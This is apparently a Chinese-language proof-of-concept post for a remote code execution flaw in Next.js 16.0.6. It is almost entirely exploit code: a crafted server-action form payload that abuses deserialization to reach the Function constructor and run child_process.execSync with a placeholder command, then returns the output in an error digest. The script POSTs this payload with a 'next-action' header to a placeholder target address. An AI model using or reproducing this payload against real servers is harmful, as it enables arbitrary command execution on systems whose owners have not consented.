Next.js 16.0.6版本漏洞poc

结果会在digest属性中

const payload = {
    0: "$1",
    1: {
        status: "resolved_model",
        reason: 0,
        _response: "$4",
        value: '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        then: "$2:then",
    },
    2: "$@3",
    3: [],
    4: {
        _prefix:
            "var res = process.mainModule.require('child_process').execSync('【待执行命令】', {'timeout': 5000}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${res}`});//",
        _formData: {
            get: "$3:constructor:constructor",
        },
        _chunks: "$2:_response:_chunks",
    },
};

import FormDataLib from "form-data";

const fd = new FormDataLib();

for (const key in payload) {
    fd.append(key, JSON.stringify(payload[key]));
}

console.log(fd.getBuffer().toString());

console.log(fd.getHeaders());

function exploitNext(baseUrl) {
    fetch(baseUrl, {
        method: "POST",
        headers: {
            "next-action": "x",
            ...fd.getHeaders(),
        },
        body: fd.getBuffer(),
    })
        .then((x) => {
            console.log("fetched", x);
            return x.text();
        })
        .then((x) => {
            console.log("got", x);
        });
}

exploitNext("【环境地址，比如http://localhost:3000/】");